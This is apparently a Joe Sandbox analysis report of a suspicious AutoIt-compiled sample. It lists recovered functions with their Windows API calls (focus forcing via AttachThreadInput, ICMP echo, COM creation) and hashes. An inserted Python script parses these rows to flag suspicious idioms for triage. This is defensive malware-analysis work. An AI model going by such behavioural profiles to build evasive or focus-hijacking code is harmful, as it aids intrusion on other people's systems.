              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
              • String ID: static
              • API String ID: 2559357485-2160076837
              • Opcode ID: 5ca803accd0b38332c15e3d324559c853b7cb9bf6fc8b9ad473bedeaeaaf8def
              • Instruction ID: 144a5753530fc947fb507264e57fb95249242b2f5466239e5c9060d8345c4466
              • Opcode Fuzzy Hash: 5ca803accd0b38332c15e3d324559c853b7cb9bf6fc8b9ad473bedeaeaaf8def
              • Instruction Fuzzy Hash: DC317A32554215ABDB229FA4EC4CFDA3B69EF09360F104224FA15A60E2D731A821DBA4
              APIs
              • _memset.LIBCMT ref: 001A707B
                • Part of subcall function 001A8D68: __getptd_noexit.LIBCMT ref: 001A8D68
              • __gmtime64_s.LIBCMT ref: 001A7114
              • __gmtime64_s.LIBCMT ref: 001A714A
              • __gmtime64_s.LIBCMT ref: 001A7167
              • __allrem.LIBCMT ref: 001A71BD
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A71D9
              • __allrem.LIBCMT ref: 001A71F0
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A720E
              • __allrem.LIBCMT ref: 001A7225
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A7243
              • __invoke_watson.LIBCMT ref: 001A72B4
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
              • String ID:
              • API String ID: 384356119-0
              • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
              • Instruction ID: 3d8f4cc58fa202f80f168f246cab22599f193b440ee9622b479e9011c4ef8302
              • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
              • Instruction Fuzzy Hash: 0271D775A04716ABD714AE79CD41BAAB3A8EF26324F14423BF514E72C1E770EB5087D0
              APIs
              • _memset.LIBCMT ref: 001E2A31
              • GetMenuItemInfoW.USER32(00246890,000000FF,00000000,00000030), ref: 001E2A92
              • SetMenuItemInfoW.USER32(00246890,00000004,00000000,00000030), ref: 001E2AC8
              • Sleep.KERNEL32(000001F4), ref: 001E2ADA
              • GetMenuItemCount.USER32(?), ref: 001E2B1E
              • GetMenuItemID.USER32(?,00000000), ref: 001E2B3A
              • GetMenuItemID.USER32(?,-00000001), ref: 001E2B64
              • GetMenuItemID.USER32(?,?), ref: 001E2BA9
              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001E2BEF
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E2C03
              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E2C24
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
              • String ID:
              • API String ID: 4176008265-0
              • Opcode ID: 4d46ca83fd82662d174b50b55087a668e84953b3ced692f4f68fd2c277a6ca09
              • Instruction ID: 37f1207fbfc6909fd8e8fb5f64d0024078747e8fcb51c4390fb52e7eea975bcd
              • Opcode Fuzzy Hash: 4d46ca83fd82662d174b50b55087a668e84953b3ced692f4f68fd2c277a6ca09
              • Instruction Fuzzy Hash: 5D61C0B0900B89AFDB21CF65DDA8EBEBBBCEB41304F240569F84193251D771AD45DB21
              APIs
              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00207214
              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00207217
              • GetWindowLongW.USER32(?,000000F0), ref: 0020723B
              • _memset.LIBCMT ref: 0020724C
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0020725E
              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002072D6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$LongWindow_memset
              • String ID:
              • API String ID: 830647256-0
              • Opcode ID: cf58f91a9d18ef26997ecaf66929f6e0b424ee2c2b9e5a45a194cee7ee67620b
              • Instruction ID: 4a5e1dc636576f486d127e886acc1f0cc3706e2ee1a2e9ac4bb1ccf29ef509c8
              • Opcode Fuzzy Hash: cf58f91a9d18ef26997ecaf66929f6e0b424ee2c2b9e5a45a194cee7ee67620b
              • Instruction Fuzzy Hash: AA616C75910309AFDB20DFA4CC85EEE77B8EB09710F140199FA14A72E2D770AD55DB60
              APIs
              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001D7135
              • SafeArrayAllocData.OLEAUT32(?), ref: 001D718E
              • VariantInit.OLEAUT32(?), ref: 001D71A0
              • SafeArrayAccessData.OLEAUT32(?,?), ref: 001D71C0
              • VariantCopy.OLEAUT32(?,?), ref: 001D7213
              • SafeArrayUnaccessData.OLEAUT32(?), ref: 001D7227
              • VariantClear.OLEAUT32(?), ref: 001D723C
              • SafeArrayDestroyData.OLEAUT32(?), ref: 001D7249
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D7252
              • VariantClear.OLEAUT32(?), ref: 001D7264
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D726F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
              • String ID:
              • API String ID: 2706829360-0
              • Opcode ID: 88db335dd251db1ec228b8359611dd05b6b7e001525723cafe5284b2a12af5d0
              • Instruction ID: 2996f52feecef788eda123db3a384f37afe68ca319f43e904cc3d5ede453e35b
              • Opcode Fuzzy Hash: 88db335dd251db1ec228b8359611dd05b6b7e001525723cafe5284b2a12af5d0
              • Instruction Fuzzy Hash: 86415135900219AFCF14DFA4DD889AEBBB8FF18354F00806AF955A7762DB30A945CF90
              APIs
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • CoInitialize.OLE32 ref: 001F8718
              • CoUninitialize.OLE32 ref: 001F8723
              • CoCreateInstance.OLE32(?,00000000,00000017,00212BEC,?), ref: 001F8783
              • IIDFromString.OLE32(?,?), ref: 001F87F6
              • VariantInit.OLEAUT32(?), ref: 001F8890
              • VariantClear.OLEAUT32(?), ref: 001F88F1
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
              • API String ID: 834269672-1287834457
              • Opcode ID: 47d5a4b41131da3e93e5205e0c70b111dca9f30ccfb474a655aae1fe2298537e
              • Instruction ID: 7df47fc99a9342ad4374ddb13a9d536350aa945fb760898df08dff9795171a65
              • Opcode Fuzzy Hash: 47d5a4b41131da3e93e5205e0c70b111dca9f30ccfb474a655aae1fe2298537e
              • Instruction Fuzzy Hash: EC61F0706083059FD710EF24C988B6FBBE8AF98754F14491DFA859B291CB30ED48CB92
              APIs
              • WSAStartup.WSOCK32(00000101,?), ref: 001F5AA6
              • inet_addr.WSOCK32(?,?,?), ref: 001F5AEB
              • gethostbyname.WSOCK32(?), ref: 001F5AF7
              • IcmpCreateFile.IPHLPAPI ref: 001F5B05
              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001F5B75
              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001F5B8B
              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001F5C00
              • WSACleanup.WSOCK32 ref: 001F5C06
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
              • String ID: Ping
              • API String ID: 1028309954-2246546115
              • Opcode ID: 91dad883f65b82a984d2d6b066816f083b7408344f7cf152b00a7a1b7adc3589
              • Instruction ID: 2c54c1b792716c8f5abadf1b23acbd9e9057fdef493fa71b8d664586b7e5ca0a
              • Opcode Fuzzy Hash: 91dad883f65b82a984d2d6b066816f083b7408344f7cf152b00a7a1b7adc3589
              • Instruction Fuzzy Hash: 11517031644B009FD721AF24DC49B3AB7E6EF48710F148969F656DB2A1DB70E940CB52
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 001EB73B
              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001EB7B1
              • GetLastError.KERNEL32 ref: 001EB7BB
              • SetErrorMode.KERNEL32(00000000,READY), ref: 001EB828
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Error$Mode$DiskFreeLastSpace
              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
              • API String ID: 4194297153-14809454
              • Opcode ID: c1b08051bd7cd57a64cac547b8e168172e0d972e4f6943d62c23448b3d4f8b6f
              • Instruction ID: 5dd18ef82790d3706db4c464df3affe41ed0fc808d0a1890ff84b5699d47cd0d
              • Opcode Fuzzy Hash: c1b08051bd7cd57a64cac547b8e168172e0d972e4f6943d62c23448b3d4f8b6f
              • Instruction Fuzzy Hash: 3B31CF34A046489FDB14EF65C8C5EBFBBB8EF98700F144029F402972D2DB719A42CB91
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001D94F6
              • GetDlgCtrlID.USER32 ref: 001D9501
              • GetParent.USER32 ref: 001D951D
              • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D9520
              • GetDlgCtrlID.USER32(?), ref: 001D9529
              • GetParent.USER32(?), ref: 001D9545
              • SendMessageW.USER32(00000000,?,?,00000111), ref: 001D9548
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$CtrlParent$ClassName_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 1536045017-1403004172
              • Opcode ID: 099fc8d9c3bda2a69a4308c3e536883b1bb720cb506e5f7c220b7e1c3db37d8a
              • Instruction ID: 9fb1710b23eb6f66332d8699589505bed1c60b1776aabe4ae44cbe29a830e3a3
              • Opcode Fuzzy Hash: 099fc8d9c3bda2a69a4308c3e536883b1bb720cb506e5f7c220b7e1c3db37d8a
              • Instruction Fuzzy Hash: 4521B274900204ABCF05AF64DCC5DFEBB79EF55310F100226B562972E2DB7599199F20
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001D95DF
              • GetDlgCtrlID.USER32 ref: 001D95EA
              • GetParent.USER32 ref: 001D9606
              • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D9609
              • GetDlgCtrlID.USER32(?), ref: 001D9612
              • GetParent.USER32(?), ref: 001D962E
              • SendMessageW.USER32(00000000,?,?,00000111), ref: 001D9631
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$CtrlParent$ClassName_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 1536045017-1403004172
              • Opcode ID: 3f95965440452c1f161b44d22463388dfdead8ff1633ab015d3ac0686e0de83d
              • Instruction ID: 84bb17a103833f676468720f68fc70df309a1f8d8f317db5a5e1e8d49413eec3
              • Opcode Fuzzy Hash: 3f95965440452c1f161b44d22463388dfdead8ff1633ab015d3ac0686e0de83d
              • Instruction Fuzzy Hash: 1A21C574940204BBDF15AB60DCC5EFEBBB9EF59300F100116F921972A2DB769959DF20
              APIs
              • GetParent.USER32 ref: 001D9651
              • GetClassNameW.USER32(00000000,?,00000100), ref: 001D9666
              • _wcscmp.LIBCMT ref: 001D9678
              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001D96F3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassMessageNameParentSend_wcscmp
              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
              • API String ID: 1704125052-3381328864
              • Opcode ID: eea8002daa99cc8786e168d6b82030c788b5a7ec94bd4f118ca2989997df4f15
              • Instruction ID: b6e0db4b4394416dc835d89b1929e52a9224d68c69e8d2ee9eadf9d7d8b1af6e
              • Opcode Fuzzy Hash: eea8002daa99cc8786e168d6b82030c788b5a7ec94bd4f118ca2989997df4f15
              • Instruction Fuzzy Hash: ED112C7B248307BAF6152620EC0BEA6779CCB17360F200127F910A55E1FF92E9914B58
              APIs
              • __swprintf.LIBCMT ref: 001E419D
              • __swprintf.LIBCMT ref: 001E41AA
                • Part of subcall function 001A38D8: __woutput_l.LIBCMT ref: 001A3931
              • FindResourceW.KERNEL32(?,?,0000000E), ref: 001E41D4
              • LoadResource.KERNEL32(?,00000000), ref: 001E41E0
              • LockResource.KERNEL32(00000000), ref: 001E41ED
              • FindResourceW.KERNEL32(?,?,00000003), ref: 001E420D
              • LoadResource.KERNEL32(?,00000000), ref: 001E421F
              • SizeofResource.KERNEL32(?,00000000), ref: 001E422E
              • LockResource.KERNEL32(?), ref: 001E423A
              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001E429B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
              • String ID:
              • API String ID: 1433390588-0
              • Opcode ID: fd527068f36c77c7ed50c1310934e583e31ce867635b80758c63acfe4ea6a079
              • Instruction ID: 599767bb9972eceb5c0815cc35f73987b7d4cc4d0a5d2bdb1e6f0c63b2ddb222
              • Opcode Fuzzy Hash: fd527068f36c77c7ed50c1310934e583e31ce867635b80758c63acfe4ea6a079
              • Instruction Fuzzy Hash: 7531CDB5A0124AAFDB159F61ED88ABF7BACEF09301F004525FE11D6151E730DA118BA0
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 001E1700
              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001E0778,?,00000001), ref: 001E1714
              • GetWindowThreadProcessId.USER32(00000000), ref: 001E171B
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0778,?,00000001), ref: 001E172A
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 001E173C
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0778,?,00000001), ref: 001E1755
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0778,?,00000001), ref: 001E1767
              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001E0778,?,00000001), ref: 001E17AC
              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,001E0778,?,00000001), ref: 001E17C1
              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,001E0778,?,00000001), ref: 001E17CC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
              • String ID:
              • API String ID: 2156557900-0
              • Opcode ID: b04a309db0076e27cc0acf15feb01445365dc626ab1e050df909a993f898e707
              • Instruction ID: a620e725d62659b7ecb09a8b95eef19801e1f8efd1a8255cb98fa0938ad2a9cf
              • Opcode Fuzzy Hash: b04a309db0076e27cc0acf15feb01445365dc626ab1e050df909a993f898e707
              • Instruction Fuzzy Hash: F231DF79A00744BBEB25DF11FD8CB6D7BA9AB2AB51F114024F810C66A0DBB09D448F60
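The API rows are the only machine-readable substance of each function entry, and the same rows recur across this AutoIt-compiled sample: the AttachThreadInput sequence in the entry just above, the IcmpSendEcho "Ping" routine earlier, and the CoCreateInstance routine before it. The following Python script is an added example for this report, not Joe Sandbox or AutoIt code. It parses rows of the form `• Name.MODULE(args), ref: ADDR` (including the `Part of subcall function` rows) into typed calls, builds a per-function module profile, and flags two idioms as triage hints. The sample input is copied from three entries on this page; the two rules (AttachThreadInput alongside GetForegroundWindow/GetWindowThreadProcessId read as a focus-forcing idiom, and the eighth IcmpSendEcho argument read as the echo timeout) are the editor's heuristics, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox 'APIs' rows (the format rendered in this report) and
flag two call idioms for triage.  Added example, not Joe Sandbox or AutoIt
code; the two rules are the editor's heuristics, not Joe Sandbox signatures."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Input: three entries copied from this report (focus handling, COM object
# creation, ICMP "Ping"); a 'Strings' header is kept so the parser has to
# skip metadata rows as it would on the real page.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 001E1700
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,001E0778,?,00000001), ref: 001E1714
• GetWindowThreadProcessId.USER32(00000000), ref: 001E171B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0778,?,00000001), ref: 001E172A
APIs
  • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
  • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
• CoInitialize.OLE32 ref: 001F8718
• CoCreateInstance.OLE32(?,00000000,00000017,00212BEC,?), ref: 001F8783
• VariantInit.OLEAUT32(?), ref: 001F8890
• VariantClear.OLEAUT32(?), ref: 001F88F1
Strings
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 001F5AA6
• inet_addr.WSOCK32(?,?,?), ref: 001F5AEB
• gethostbyname.WSOCK32(?), ref: 001F5AF7
• IcmpCreateFile.IPHLPAPI ref: 001F5B05
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001F5B75
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 001F5C00
• WSACleanup.WSOCK32 ref: 001F5C06
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
HEX_RE = re.compile(r"^(-?)([0-9A-F]{8})$")


def parse_arg(tok: str):
    """8-digit hex tokens become ints; '?' (unresolved) and literals stay strings."""
    m = HEX_RE.match(tok)
    if not m:
        return tok
    value = int(m.group(2), 16)
    return -value if m.group(1) else value


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: int                      # address of the call site
    subcall_of: int | None = None  # set for "Part of subcall function" rows


@dataclass
class Function:
    calls: list = field(default_factory=list)

    def names(self) -> set:
        """APIs the function itself calls (subcall rows excluded)."""
        return {c.name for c in self.calls if c.subcall_of is None}

    def module_profile(self) -> dict:
        prof: dict = {}
        for c in self.calls:
            if c.subcall_of is None:
                prof[c.module] = prof.get(c.module, 0) + 1
        return prof


def parse_listing(text: str) -> list:
    """Start a new Function at every 'APIs' header; collect the call rows under it."""
    funcs: list = []
    cur = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Function()
            funcs.append(cur)
            continue
        m = CALL_RE.match(line)
        if cur is None or not m:
            continue  # metadata rows (Strings, Memory Dump Source, ...) are skipped
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        cur.calls.append(Call(m["name"], m["mod"], args, int(m["ref"], 16), sub))
    return funcs


def focus_steal(fn: Function) -> bool:
    """AttachThreadInput next to a foreground-window/thread lookup: the usual way
    to defeat the foreground lock and push input focus into another process's
    window.  UI-automation runtimes do this too, so it is a hint, not a verdict."""
    n = fn.names()
    return "AttachThreadInput" in n and {"GetForegroundWindow", "GetWindowThreadProcessId"} <= n


def icmp_timeout_ms(fn: Function) -> int | None:
    """Timeout (8th argument of IcmpSendEcho) if the function sends ICMP echoes."""
    for c in fn.calls:
        if c.name == "IcmpSendEcho" and len(c.args) == 8 and isinstance(c.args[7], int):
            return c.args[7]
    return None
```

On the three entries above the ICMP routine decodes to a 4000 ms timeout (0x00000FA0) with a 0x29-byte reply buffer and the focus routine is flagged, while the COM routine only yields its module profile. Keep the flags as hints: the same AttachThreadInput sequence is what a legitimate automation runtime uses to activate windows, so the finding needs the process-injection and credential-theft signatures from the top of this report before it carries weight.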
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$ClearInit$_memset
              • String ID: ,,!$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
              • API String ID: 2862541840-1342065348
